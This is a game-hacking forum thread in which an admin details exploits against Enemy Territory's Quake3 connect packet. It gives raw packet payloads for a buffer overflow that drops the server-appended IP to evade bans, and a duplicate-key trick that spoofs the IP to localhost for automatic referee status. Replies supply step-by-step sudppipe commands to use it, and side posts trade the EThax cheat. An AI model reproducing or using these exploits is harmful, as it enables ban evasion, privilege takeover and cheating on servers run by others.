Navigation

    • Register
    • Login
    • Search
    • Categories
    • Unread
    • Recent
    • Popular
    • Search

    OOB IP Spoofing exploits: Referee hack & Unban

    General
    hack ip spoof ref referee
    3
    9
    4724
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • Annihil
      Annihil admin last edited by Annihil

      Enemy Territory uses the Quake3 network protocol.

      When you connect to a server, the communication is initialized by an OOB (Out of Band) message, which format is:

      ����connect "<userinfo>"
      

      The ���� is the packet header, it is equal to 0xFF 0xFF 0xFF 0xFF and is used to identify the packet type.

      connect is the command intended.

      The userinfo is a key-value string which format is \key\value.

      The userinfo contains

      • g_password: the server password
      • cl_guid: the etkey
      • cl_wwwDownload: whether the client allow pk3 download
      • name: the player name
      • rate: the packet transfer rate
      • snaps: the ping adjustement ?
      • cl_punkbuster: whether punkbuster is enabled
      • protocol: the protocol version, here 84
      • qport: the client port used
      • challenge: a random number ?

      The raw line looks like this:

      ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564"
      

      Now, when the server receive the connect query message, it appends another value at the end of your userinfo, your IP

      ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\ip\216.3.128.12:60252"
      

      There is two ways to alter this value

      Buffer Overflow

      The <userinfo> is a char array of size 1024

      #define MAX_INFO_STRING 1024
      

      and thought of adding a long key-value of (1024 - the current <userinfo>) length char at the end of the sent userinfo.

      It looks like this

      ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
      

      So, here, my <userinfo> followed by \421 × A\420 × A

      When the server receive that, it will add you IP after your userinfo, but as it's stored in a char[1024] variable, a buffer overflow occurs and your IP is discarded.

      The server does not know your current IP anymore, and if you were IP banned, now you're not.

      Duplicate field exploit

      If the server receive the same key in the userinfo string, it will remove the last duplicated key.

      Inserting

      \ip\216.3.128.12:60252\ip\216.3.128.12:60252
      

      after the name key (for example) will make the server remove the last ip key, which is your real ip, keeping the one you inserted in your fake userinfo.

      The raw line would looks like that

      ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\ip\locahost\ip\localhost\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\693\challenge\385942564"
      

      This method makes it possible to spoof IP.

      Now, another exploit can be used with IP spoofing.

      Referee hack

      Instead of spoofing the IP to a random IP like 216.3.128.12, spoofing it to localhost will automatically promote the player to Referee status.

      1 Reply Last reply Reply Quote 0
      • D
        DrWindows last edited by

        Does it still work?

        Annihil 1 Reply Last reply Reply Quote 0
        • Annihil
          Annihil admin @DrWindows last edited by

          @DrWindows On some servers yes

          1 Reply Last reply Reply Quote 0
          • D
            DrWindows last edited by

            I dont get how it works? Can u explain that ref hack?`

            Annihil 1 Reply Last reply Reply Quote 0
            • Annihil
              Annihil admin @DrWindows last edited by Annihil

              You can use Simple UDP proxy/pipe 0.4.1 (sudppipe) with Quake 3 engine "connect" modifier 0.2 (q3conmod_sudp) (compatible with Enemy Territory as it uses quake3 network protocol)

              plugin for sudppipe which allows a simple customization of the "connect" packet for the games which use the Quake 3 engine:
              sudppipe -l q3conmod_sudp.dll -L "\parameter1\value1\parameter2\value2" IP PORT 1234
              (use -L "" for the runtime help) then from the console of the game type: /connect 127.0.0.1:1234
              the following is an example for joining a server which uses PunkBuster with PB disabled (the client will be kicked after some seconds/minutes):
              sudppipe -l q3conmod_sudp.dll -L "\cl_punkbuster\1" SERVER PORT 1234
              then from the client:
              /pb_cl_disable
              /connect 127.0.0.1:1234

              So to spoof your IP address, you can use
              sudppipe -l q3conmod_sudp.dll -L "\ip\216.3.128.12:60252\ip\216.3.128.12:60252" SERVER PORT 1234
              Then, ingame, /connect 127.0.0.1 1234

              D 1 Reply Last reply Reply Quote 0
              • D
                DrWindows @Annihil last edited by

                @Annihil I dont get anything xD where do i need to type that?

                Annihil 1 Reply Last reply Reply Quote 0
                • Annihil
                  Annihil admin @DrWindows last edited by Annihil

                  @DrWindows In the Windows Command Prompt (cmd)

                  1 Reply Last reply Reply Quote 0
                  • D
                    DrWindows last edited by

                    Its really confusing.

                    Can u write a tutorial with like.
                    1st u do this
                    2nd this etc?

                    1 Reply Last reply Reply Quote 0
                    • S
                      sekenbeken last edited by

                      Hello!
                      You do not know why it causes a cmd failure? I do everything according to your guide.
                      Bat File:
                      https://imgur.com/GMbzy40
                      (4 is port)
                      Connecting to server:
                      https://i.imgur.com/HGHHjTT.jpg
                      https://i.imgur.com/EZ94RS4.jpg
                      https://i.imgur.com/vJh1ebI.jpg

                      1 Reply Last reply Reply Quote 0
                      • First post
                        Last post
                      • @megvadulthangya seems like an outdated instruction, all the files are there

                        • read more
                      • M

                        @annihil cant config that one couse i think missing files not just cfg's.
                        The Readme install says:
                        |9 Steps to Run EThax GooD Look :)| Tutorial by Immortal
                        1.

                        Download EThax 0.1 "Remember EThax is not Release and not open source dont give anyone this verssion" Link:

                        LoL
                        Annihil you have that file somewhere? Please

                        you would look under your bed ?? :D

                        • read more
                      • @megvadulthangya yeah iirc ETH has auto offsets finding and it works on nq :)

                        • read more
                      • M

                        @annihil ethax_0.3_beta? Looks like its working with nq1.2.9 but missing some cfg's

                        Copy from EThax_Priv/EThax_Src/EThax_Bin/Configs:
                        human.cfg
                        human2.cfg
                        rage.cfg

                        Paste it to yours home folder DIR and
                        now we have avible command in console

                        ooh maybe not maybe you put together the twoo thing? As i can read the readme....

                        Dependencies is killing me :D need older distro for this

                        • read more